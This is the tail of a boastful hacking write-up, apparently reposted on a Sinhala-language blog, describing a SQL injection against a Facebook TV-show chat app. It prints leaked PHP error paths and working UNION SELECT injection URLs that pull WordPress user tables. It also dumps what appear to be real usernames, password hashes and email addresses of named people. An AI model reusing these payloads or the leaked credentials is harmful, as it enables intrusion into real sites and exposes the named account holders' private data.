        772. Warning: simplexml_load_string() [function.simplexml-load-string]: ^ in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
        773.  
        774. Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 7: parser error : Opening and ending tag mismatch: body line 3 and html in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
        775.  
        776. Warning: imagepng() [function.imagepng]: Unable to open '/home/tomkincaid/tomkincaid.dreamhosters.com/tv/badges/text/ /1 and 1=2 union select count(*) from candukincaid.wp_users-- 1.png' for writing: No such file or directory in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/show.php on line 67
        777.  
        778. 3 <= ALERT! Users! =]
        779.  
        780. Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 6: parser error : Opening and ending tag mismatch: hr line 5 and body in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 123
        781.  
        782. Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/show.php on line 124
        783.  
        784. oooooooooooooooooooooooooooo
        785.  
        786. ..> Crach_exploit [ENTER]
        787.  
        788. user:
        789.  
        790. admin:$P$BDYUCMozJ/i3UEatmeECLxd3FTLqIe/
        791. lucia:$P$BTlzOyWH5F7gdi42xVjtPMnBGDki1W/
        792. tom:$P$BkfTC.PaWW8alUSQd9j8PSUBG0LIiR.
        793.  
        794. cracker:
        795.  
        796. admin : $P$BDYUCMozJ/i3UEatmeECLxd3FTLqIe/ :admin:lcandu@yahoo.com
        797. lucia : $P$BTlzOyWH5F7gdi42xVjtPMnBGDki1W/ :lucia:lcandu@yahoo.com
        798. tom : $P$BkfTC.PaWW8alUSQd9j8PSUBG0LIiR.   :tom:tom_kincaid@hotmail.com
        799.  
        800. see request:
        801.  
        802.  
        803. http://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+concat_ws(0x3a,user_login,user_pass)+from+candukincaid.wp_users+limit+1--
        804. http://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+concat_ws%280x3a,user_login,user_pass%29+from+candukincaid.wp_users+limit+1,1--
        805. http://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+concat_ws%280x3a,user_login,user_pass%29+from+candukincaid.wp_users+limit+2,1--
        806.  
        807.  
        808.  
        809. goOd =] Nice Hacking old school xD
        810.  
        811.  
        812.    __             __   __ __      
        813.  /'__`\         /'__`\/\ \\ \    
        814. /\ \/\ \  __  _/\ \/\ \ \ \\ \    
        815. \ \ \ \ \/\ \/'\ \ \ \ \ \ \\ \_  
        816.  \ \ \_\ \/>  </\ \ \_\ \ \__ ,__\
        817.   \ \____//\_/\_\\ \____/\/_/\_\_/
        818.    \/___/ \//\/_/ \/___/    \/_/  
        819.            [Conclusion]
        820.  
        821.                                    
        822.  
        823. There's no 100% security! Be safe my friends! Watch for vulnerabilities and promptly update!  ( Exploit Database)
        824.  
        825.  
        826.  
        827.    __             __   ______    
        828.  /'__`\         /'__`\/\  ___\  
        829. /\ \/\ \  __  _/\ \/\ \ \ \__/  
        830. \ \ \ \ \/\ \/'\ \ \ \ \ \___``\
        831.  \ \ \_\ \/>  </\ \ \_\ \/\ \L\ \
        832.   \ \____//\_/\_\\ \____/\ \____/
        833.    \/___/ \//\/_/ \/___/  \/___/
        834.              [Greetz]
        835.  
        836.  
        837.  


ලිව්වෙ at 7:46 AM
ඛාණ්ඩ , , , , ,

1 ප්‍රතිචර:

බැලුවද?

ඉතිං එහෙනම් කමෙන්ට එකක් දාලා යමු නෙද?

Subscribe to: Post Comments (Atom)